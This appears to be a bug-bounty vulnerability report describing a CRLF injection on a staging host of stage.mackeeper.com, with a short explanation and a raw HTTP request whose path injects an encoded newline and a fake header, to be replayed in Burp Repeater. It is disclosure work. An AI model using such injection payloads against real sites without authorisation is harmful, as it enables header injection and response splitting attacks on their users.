CRLF Injection - http://stage.mackeeper.com/

### Summary: CRLF Injection - http://stage.mackeeper.com/ CRLF injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response. Vulnerable URL: hhttp://stage.mackeeper.com/ ### Steps To Reproduce: In the rawRequest we have added '%0D%0Avirus:%20value' In Burp Repeater copy and paste the below rawRequest Notice the response with header added ------rawRequest---------- GET /%0D%0Avirus:%20value HTTP/1.1 Connection: keep-alive Accept: / Accept-Encoding: gzip,deflate Host: stage.mackeeper.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 ------rawRequest----------